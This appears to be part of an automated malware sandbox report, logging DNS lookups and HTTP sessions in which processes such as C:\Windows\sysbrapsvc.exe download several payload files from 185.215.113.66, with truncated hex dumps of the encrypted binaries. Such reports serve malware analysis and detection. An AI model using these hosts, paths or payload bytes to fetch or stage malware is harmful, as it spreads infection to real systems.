May 8, 2024 15:22:59.595222950 CEST | 1.1.1.1 | 192.168.2.8 | 0xc317 | No error (0) | mta7.am0.yahoodns.net | | 67.195.204.77 | A (IP address) | IN (0x0001) | false
May 8, 2024 15:22:59.595222950 CEST | 1.1.1.1 | 192.168.2.8 | 0xc317 | No error (0) | mta7.am0.yahoodns.net | | 67.195.228.110 | A (IP address) | IN (0x0001) | false
May 8, 2024 15:22:59.595222950 CEST | 1.1.1.1 | 192.168.2.8 | 0xc317 | No error (0) | mta7.am0.yahoodns.net | | 98.136.96.75 | A (IP address) | IN (0x0001) | false
May 8, 2024 15:23:07.862080097 CEST | 1.1.1.1 | 192.168.2.8 | 0x5b49 | No error (0) | twizt.net | | 185.215.113.66 | A (IP address) | IN (0x0001) | false
                                                                              • 185.215.113.66
                                                                              • twizt.net
                                                                              • 91.202.233.141
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49708 | 185.215.113.66 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 15:22:19.785147905 CEST | 166 | OUT | GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
May 8, 2024 15:22:20.126646996 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:22:19 GMT
Content-Type: application/octet-stream
Content-Length: 101120
Last-Modified: Mon, 06 May 2024 15:20:46 GMT
Connection: keep-alive
ETag: "6638f54e-18b00"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49710 | 185.215.113.66 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 15:22:21.481426001 CEST | 166 | OUT | GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
May 8, 2024 15:22:21.823957920 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:22:21 GMT
Content-Type: application/octet-stream
Content-Length: 101120
Last-Modified: Mon, 06 May 2024 15:20:46 GMT
Connection: keep-alive
ETag: "6638f54e-18b00"
Accept-Ranges: bytes
May 8, 2024 15:22:29.232702017 CEST | 166 | OUT | GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
May 8, 2024 15:22:33.659881115 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:22:33 GMT
Content-Type: application/octet-stream
Content-Length: 15104
Last-Modified: Wed, 24 Apr 2024 23:21:57 GMT
Connection: keep-alive
ETag: "66299415-3b00"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49712 | 185.215.113.66 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 15:22:35.021296024 CEST | 166 | OUT | GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
May 8, 2024 15:22:35.386194944 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:22:35 GMT
Content-Type: application/octet-stream
Content-Length: 15104
Last-Modified: Wed, 24 Apr 2024 23:21:57 GMT
Connection: keep-alive
ETag: "66299415-3b00"
Accept-Ranges: bytes
May 8, 2024 15:22:43.432187080 CEST | 166 | OUT | GET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
May 8, 2024 15:22:43.773205042 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:22:43 GMT
Content-Type: application/octet-stream
Content-Length: 81928
Last-Modified: Wed, 24 Apr 2024 23:29:53 GMT
Connection: keep-alive
ETag: "662995f1-14008"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49713 | 185.215.113.66 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 15:22:45.120923996 CEST | 166 | OUT | GET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
May 8, 2024 15:22:45.471815109 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:22:45 GMT
Content-Type: application/octet-stream
Content-Length: 81928
Last-Modified: Wed, 24 Apr 2024 23:29:53 GMT
Connection: keep-alive
ETag: "662995f1-14008"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49715 | 185.215.113.66 | 80 | 2060 | C:\Users\user\AppData\Local\Temp\1146722911.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 15:22:46.392240047 CEST | 167 | OUT | GET /_1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: 185.215.113.66
May 8, 2024 15:22:46.732431889 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:22:46 GMT
Content-Type: application/octet-stream
Content-Length: 9224
Last-Modified: Wed, 08 May 2024 11:35:13 GMT
Connection: keep-alive
ETag: "663b6371-2408"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49716 | 185.215.113.66 | 80 | 2060 | C:\Users\user\AppData\Local\Temp\1146722911.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 15:22:48.088958025 CEST | 167 | OUT | GET /_1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: 185.215.113.66
May 8, 2024 15:22:48.428845882 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:22:48 GMT
Content-Type: application/octet-stream
Content-Length: 9224
Last-Modified: Wed, 08 May 2024 11:35:13 GMT
Connection: keep-alive
ETag: "663b6371-2408"
Accept-Ranges: bytes
May 8, 2024 15:22:54.529365063 CEST | 167 | OUT | GET /_2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: 185.215.113.66
May 8, 2024 15:22:54.869136095 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 08 May 2024 13:22:54 GMT
Content-Type: application/octet-stream
Content-Length: 9224
Last-Modified: Tue, 07 May 2024 18:30:40 GMT
Connection: keep-alive
ETag: "663a7350-2408"
Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:22:54.869206905 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:22:54.869303942 CEST | 1289 | IN | Data Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:22:54.869362116 CEST | 1289 | IN | Data Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              6 | 192.168.2.8 | 49717 | 185.215.113.66 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:22:48.681726933 CEST | 274 | OUT | GET /3 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                              Host: 185.215.113.66
                                                                              Connection: Keep-Alive
                                                                              May 8, 2024 15:22:49.024024010 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:48 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 81928
                                                                              Last-Modified: Wed, 24 Apr 2024 23:29:53 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "662995f1-14008"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 f7 01 b2 60 0c 25 58 36 49 b9 34 23 91 28 4e 72 ab 02 06 2a ee b3 46 54 3e 3a 68 4e 47 4a 0c 37 91 b7 a4 1b 38 a1 9a e0 b0 c4 fe 21 20 44 58 a6 82 6d cd 53 58 f1 3b ac 19 89 a1 3d 8b 90 83 b4 71 ef eb 13 7a 28 73 20 51 f4 00 23 77 f7 2b 57 60 82 4a 56 6a 86 65 65 f4 3b 70 d7 7e e1 94 a3 80 aa 9f 61 33 fa c2 5f 90 b0 88 84 2c b5 14 92 38 68 0a 3a f6 a8 e8 70 3c 63 fa 87 27 43 2b f1 17 2e 48 bc 40 39 94 d5 09 2e 37 61 67 27 e3 d9 d7 11 b1 73 b6 44 ee a1 48 67 ce 3b 0d 47 de 6c 49 99 78 8e 32 06 7e cb 06 99 e2 8b b5 22 65 91 47 ca 9b f4 f8 70 e1 34 32 30 ab 66 24 ff 18 2d 2a ab a4 8e 3e 8f 4e 6f f9 37 ff 23 0c bf fa 23 74 76 8a c0 5b 91 ba 64 3c ba 64 84 a9 8a 05 47 f3 ae 16 c6 d5 ac f8 f2 e3 22 12 89 76 35 e9 23 19 da 63 c6 f6 7c eb 00 02 5d a9 90 93 72 c1 57 89 70 e8 c7 c7 ff 7e f7 25 72 e0 5b 68 5a 13 5f db 38 e3 e0 b0 df b4 6c f2 6c 3f 6c 32 2c 82 bf c0 0e 20 00 01 74 e7 94 6e d0 d7 31 4b fa 19 92 fa 71 85 57 70 41 0d c0 65 20 72 73 20 94 9c e7 af b6 92 a0 3f 21 39 04 9a db [TRUNCATED]
                                                                              Data Ascii: NGS!`%X6I4#(Nr*FT>:hNGJ78! DXmSX;=qz(s Q#w+W`JVjee;p~a3_,8h:p<c'C+.H@9.7ag'sDHg;GlIx2~"eGp420f$-*>No7##tv[d<dG"v5#c|]rWp~%r[hZ_8ll?l2, tn1KqWpAe rs ?!9s,i}G:x} M]:wTU+v*@V-7m+j!LqmJmVHiYHq[JG1j\Z+J2[?#fzYV"9(UWIJ's-OW`o0pmRVaj;wm57*iWysesZ5{(|+tDo>DQbd.W}@^=w%}C?2EN4jfi/kOppZ6I$aJ_/028M*J0y!=g[v]c@9d^H2~l(pc-'7JagPYP.mt&/btva}gfu;'Z~[Vn~5RkM@q/:=`:G^'CT<Czv`b=/>&-U|pjM,/fWO4]9D-\F'bOQW`6sb_ [TRUNCATED]
                                                                              May 8, 2024 15:22:49.024044991 CEST | 1289 | IN | Data Raw: 28 55 b0 14 8d 25 75 01 4e 4d c0 61 ac 41 b4 b2 02 db 28 1b 34 b9 e4 3d 5a ba a7 41 58 c9 72 51 09 58 06 57 a5 6a 1d a6 dc db 3c 54 91 a4 f0 53 ee c7 b4 4c 31 29 c9 3b 7d 28 06 68 a2 46 ea 8f 96 45 61 a0 bd ec 9d 9e b3 9f b9 6f db 99 91 9e cc ab
                                                                              Data Ascii: (U%uNMaA(4=ZAXrQXWj<TSL1);}(hFEao@@s3poh[Z6~E7Y\YdQ87$>/v2/'jIA*i$ZtBa4PdG5KQ^(,q{:)CYd;}U:
                                                                              May 8, 2024 15:22:49.024104118 CEST | 1289 | IN | Data Raw: 73 80 0b b2 b8 b4 ed b4 ec 6c 6e 29 64 94 41 b8 c2 5b fe a0 26 a2 02 7f 86 2b d0 b5 9d 1b c4 eb 99 d1 84 a5 c4 9b e4 4a 3f ae 54 38 64 fd 73 7b bc b0 b7 f7 35 22 98 66 d9 e0 9c 2c 14 4c 63 dd 51 30 2a 35 e5 bd c5 71 38 09 82 3b 49 c8 cb 06 d7 be
                                                                              Data Ascii: sln)dA[&+J?T8ds{5"f,LcQ0*5q8;IW5F_E,`uvybARUBv@5:{sU~wLFy~I3z?>Twh,GY(@5D?39wne5Fud!Ji
                                                                              May 8, 2024 15:22:49.024142027 CEST | 1289 | IN | Data Raw: c4 bb 2d ef 3e bc d7 cf 85 b5 61 42 c9 31 64 7b 11 00 a5 c9 ec bc 34 06 66 4e 0f 74 8f 73 02 53 34 4b 68 9c c2 bc c8 87 b4 4d 97 89 8e b7 7d ce 64 8b 08 fe a7 b9 04 ca a1 ad e8 0e 46 11 2f 0b 88 83 36 8f a2 c3 5b d6 10 ae bb 3d d8 38 cf 91 4f ed
                                                                              Data Ascii: ->aB1d{4fNtsS4KhM}dF/6[=8O^b$/lb8nfD;AzN=O'F+~gV#q*(*(%d]d!E)xJ:.Ku[_ofLVQiGA*x
                                                                              May 8, 2024 15:22:49.024156094 CEST | 1289 | IN | Data Raw: 47 61 a6 d7 8b e2 18 06 d4 a0 0f 77 f1 a8 b0 18 f4 e7 aa e1 f4 10 d3 6c 24 a6 92 4a 95 43 61 2d 33 b6 ea 6c 67 db 6c f1 95 8b c3 ca 0a d3 82 4b 20 b2 2c 8a 71 ed 28 57 22 b0 3e cf fd 51 37 9e 01 db db 71 df 58 6e e1 04 c1 79 7e b7 1d e7 32 64 68
                                                                              Data Ascii: Gawl$JCa-3lglK ,q(W">Q7qXny~2dhr.1N5dN]YIZ]svq|1bT0T2L>Kk`]H4X"kD/e6o[&/RcKT_N`MGmtocl;-EH-t JbB
                                                                              May 8, 2024 15:22:49.024173975 CEST | 1289 | IN | Data Raw: 19 15 22 5a d7 57 6d 08 b4 ae a5 2d 9c 05 b2 e7 76 a1 88 d8 95 a0 92 12 78 8c 9e 84 bb 25 c3 0e ea 62 c0 e8 67 46 ce f2 85 e2 86 aa 56 e3 03 22 c9 e8 1c d4 fd 1d f3 66 d5 d2 6e a9 8f db d2 fb 8e 6c 5a 7c e2 ea 43 e3 75 e5 ab 3a 6b 8b 08 76 b5 e4
                                                                              Data Ascii: "ZWm-vx%bgFV"fnlZ|Cu:kvG\Cd!9s$Wvbc{Lz4p%+2&m=J LE9Kl64H"~c/`J'tSy
                                                                              May 8, 2024 15:22:49.024188995 CEST | 1289 | IN | Data Raw: cf ac a7 be eb 73 e4 d3 ed 5b 03 72 0a 74 77 67 b8 06 90 b3 68 26 cd 09 26 77 da e1 de 04 4a 31 c4 2a f5 4e d0 17 74 d1 64 56 8a 35 52 8e a2 c2 49 84 cb d5 ba 8a de 29 c8 64 33 1d ea 1f 9d 54 a4 dc a7 44 ad 90 58 ad 3d ed d8 e9 11 8b bf 96 37 2b
                                                                              Data Ascii: s[rtwgh&&wJ1*NtdV5RI)d3TDX=7+_TDx*dMT&J&XhG0{lwY]u</08I}F?yJxis}{2?FqiI]'Vv0KK'C_`B/E$=k5\$8
                                                                              May 8, 2024 15:22:49.024203062 CEST | 1289 | IN | Data Raw: 18 ea 62 90 fb d4 85 d0 ad 0c ca 89 b2 53 60 05 7d 76 96 c6 1b 11 21 ee b4 7a fb 80 51 ed f3 ab 53 d4 03 87 1e e5 51 de b5 72 0c 29 40 27 ef fe 36 61 96 0b 02 9b d9 49 77 04 7e 0b be 98 bd b5 4e 86 ad 27 41 28 99 57 26 9d c5 79 01 3f 69 69 0b 0e
                                                                              Data Ascii: bS`}v!zQSQr)@'6aIw~N'A(W&y?iiz$X2Wq&44o#H<uwV5pWv;}]rxsi3}'/_:4!0EUD7H\l9B-uLr3%3)"iKYw_3b1!]/
                                                                              May 8, 2024 15:22:49.024250984 CEST | 1289 | IN | Data Raw: 98 f8 17 51 a5 46 a9 06 8f 70 7e d1 56 4e 09 36 93 48 63 2d e4 5e 59 fe 7f d8 01 fc 73 11 04 eb 66 af 5f 05 e8 fa 5e 30 56 18 e8 12 c0 d7 0f 05 48 45 9f 97 4f b9 c8 ba a5 74 d5 06 3f 27 fd 27 2d af 17 cb 93 d8 14 f2 53 f2 fa 4e 30 b9 7c 59 d9 07
                                                                              Data Ascii: QFp~VN6Hc-^Ysf_^0VHEOt?''-SN0|Ye"I@/&'pz251my 50Ki8HP38FG^ZOEV-sOSBSp1@JlgTJrJg6gGwE\Wg
                                                                              May 8, 2024 15:22:49.024271011 CEST | 1289 | IN | Data Raw: 41 d9 38 85 ee da 1f 10 58 78 ef c3 e6 5f 03 31 de e6 ca fb a1 25 b6 07 9d 1b b2 31 a6 4b f2 95 cf 45 5a 45 f9 ea 7f ba c1 4d b7 5b d9 ed 98 aa 58 ac f9 58 2c a7 8c 2a c0 64 76 05 f9 ea 6b 0c 6e a7 cc 9f 95 3a 5f 91 fe 5f 03 e9 99 02 db a3 ae cd
                                                                              Data Ascii: A8Xx_1%1KEZEM[XX,*dvkn:__p:2@{<@W^Y9UaKJ}_{J5J=N2)kF zXlyd}72iZbEkzf2<Meo9"fbuDgI:65+Zn(ylM
                                                                              May 8, 2024 15:22:49.366421938 CEST | 1289 | IN | Data Raw: 04 f1 04 68 70 6d 25 a5 24 64 db 9c 1f 55 9b bb d5 7d 93 b6 b0 59 82 37 48 16 39 7d 95 ba d9 9a 0c e1 8a 9d ec 79 73 e1 b9 9e 01 ac 65 4e 76 07 47 59 6c eb 1a d5 8b f7 6c ba 2b bc 78 f5 54 f8 96 58 43 5d af 42 06 be 91 8b 5c d1 3e 11 89 bf 48 2b
                                                                              Data Ascii: hpm%$dU}Y7H9}yseNvGYll+xTXC]B\>H+8Y?vROQT$O<8c8]>!nxQt1K=Tm`loww?#@!C9/WHO+Rnym:|5`Dd{K/(Y?
                                                                              May 8, 2024 15:22:51.787626982 CEST | 166 | OUT | GET /4 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:52.129470110 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:51 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 22272
                                                                              Last-Modified: Wed, 08 May 2024 11:20:38 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6006-5700"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 9f 99 07 20 de 8d 44 f2 f6 13 df bc 7b 00 82 92 55 ab c0 21 68 c7 50 d3 19 59 e0 1a 73 e0 76 26 1b b0 8d 43 32 3a 53 97 36 02 bd b0 9d 94 d9 d9 e6 c8 59 cf e0 0e 72 c6 32 5a 9e 9f 97 7c cb 13 c9 e0 19 a5 09 12 87 cb ba 5b 7a e5 af 4d 86 e0 bc 1a 77 78 74 51 85 f5 3f e6 db 6b fc 38 23 e2 47 60 66 86 05 46 d4 d0 61 58 4d 7c 07 df 73 3a ff d9 2e a2 ab f2 89 a6 a5 fe 3f 10 d7 d2 54 e1 66 4c 7f c2 68 a8 2a 13 33 94 81 3c fe a8 55 4d 30 cd 47 a2 f1 35 9b 01 8a 74 b0 79 40 30 5e 56 b0 85 7c ea 4e 29 48 f8 b5 08 05 e7 2b cc 4c d6 f1 a7 9c 9d ed 33 a6 83 5c 4c ce 95 bd fb 74 2d e0 f4 7c fb 1e a8 da 7e b5 55 ad 3b 19 3b a0 c7 ff 22 a0 25 c0 02 20 9c c5 34 2b 3a 79 64 b2 1e 6b 85 de fc 1e 68 5f 98 1a f2 cf 49 c5 25 68 e5 3a 17 ab 13 f7 3b 97 e5 9b 39 16 54 78 41 b6 0c d2 97 ee 7f 2c c9 d6 d3 8c 0d 2e 2e 84 7e 43 b0 7d 2b a8 38 2a 03 a8 92 0a 7a b1 c5 c4 b4 12 c1 9b 29 d1 bd 69 42 b3 09 6c 81 d3 fc 77 f6 47 df 9f 8c 6d 12 1f 88 fb 8c 9f 6b 37 3b ec 4c 7e 36 f7 34 fa 50 ee 6a 0d 7c 09 14 68 b2 73 50 76 bc dc 4e [TRUNCATED]
                                                                              Data Ascii: D{U!hPYsv&C2:S6Yr2Z|[zMwxtQ?k8#G`fFaXM|s:.?TfLh*3<UM0G5ty@0^V|N)H+L3\Lt-|~U;;"% 4+:ydkh_I%h:;9TxA,..~C}+8*z)iBlwGmk7;L~64Pj|hsPvN(~&rf&5a|7{Jt\JW be)k1:Z7Np'P=Q84Dx8As.bi$56R2*)K3WLZpP&&J{=.cCzhZjBB[!N>:.9*v=LFC#GO\ Y6S{gf|=zlA=R0Dqh}RN@yWhQTWTDS{9IYAfE",K*UtKh)3/f4QWi#@NZ~qPp63!cEeV6T8`k?)x\]<SbA2xK? X&|Lxvg(8YD.NL+o=(zuj2@Jj'6=m;A?<JX+K^($1i+:R2|qnCo4jd=Gs%/'A+h"wji*>*b [TRUNCATED]


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              7 | 192.168.2.8 | 49718 | 185.215.113.66 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:22:53.487994909 CEST | 166 | OUT | GET /4 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:53.829191923 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:53 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 22272
                                                                              Last-Modified: Wed, 08 May 2024 11:20:38 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6006-5700"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 9f 99 07 20 de 8d 44 f2 f6 13 df bc 7b 00 82 92 55 ab c0 21 68 c7 50 d3 19 59 e0 1a 73 e0 76 26 1b b0 8d 43 32 3a 53 97 36 02 bd b0 9d 94 d9 d9 e6 c8 59 cf e0 0e 72 c6 32 5a 9e 9f 97 7c cb 13 c9 e0 19 a5 09 12 87 cb ba 5b 7a e5 af 4d 86 e0 bc 1a 77 78 74 51 85 f5 3f e6 db 6b fc 38 23 e2 47 60 66 86 05 46 d4 d0 61 58 4d 7c 07 df 73 3a ff d9 2e a2 ab f2 89 a6 a5 fe 3f 10 d7 d2 54 e1 66 4c 7f c2 68 a8 2a 13 33 94 81 3c fe a8 55 4d 30 cd 47 a2 f1 35 9b 01 8a 74 b0 79 40 30 5e 56 b0 85 7c ea 4e 29 48 f8 b5 08 05 e7 2b cc 4c d6 f1 a7 9c 9d ed 33 a6 83 5c 4c ce 95 bd fb 74 2d e0 f4 7c fb 1e a8 da 7e b5 55 ad 3b 19 3b a0 c7 ff 22 a0 25 c0 02 20 9c c5 34 2b 3a 79 64 b2 1e 6b 85 de fc 1e 68 5f 98 1a f2 cf 49 c5 25 68 e5 3a 17 ab 13 f7 3b 97 e5 9b 39 16 54 78 41 b6 0c d2 97 ee 7f 2c c9 d6 d3 8c 0d 2e 2e 84 7e 43 b0 7d 2b a8 38 2a 03 a8 92 0a 7a b1 c5 c4 b4 12 c1 9b 29 d1 bd 69 42 b3 09 6c 81 d3 fc 77 f6 47 df 9f 8c 6d 12 1f 88 fb 8c 9f 6b 37 3b ec 4c 7e 36 f7 34 fa 50 ee 6a 0d 7c 09 14 68 b2 73 50 76 bc dc 4e [TRUNCATED]
                                                                              Data Ascii: D{U!hPYsv&C2:S6Yr2Z|[zMwxtQ?k8#G`fFaXM|s:.?TfLh*3<UM0G5ty@0^V|N)H+L3\Lt-|~U;;"% 4+:ydkh_I%h:;9TxA,..~C}+8*z)iBlwGmk7;L~64Pj|hsPvN(~&rf&5a|7{Jt\JW be)k1:Z7Np'P=Q84Dx8As.bi$56R2*)K3WLZpP&&J{=.cCzhZjBB[!N>:.9*v=LFC#GO\ Y6S{gf|=zlA=R0Dqh}RN@yWhQTWTDS{9IYAfE",K*UtKh)3/f4QWi#@NZ~qPp63!cEeV6T8`k?)x\]<SbA2xK? X&|Lxvg(8YD.NL+o=(zuj2@Jj'6=m;A?<JX+K^($1i+:R2|qnCo4jd=Gs%/'A+h"wji*>*b [TRUNCATED]
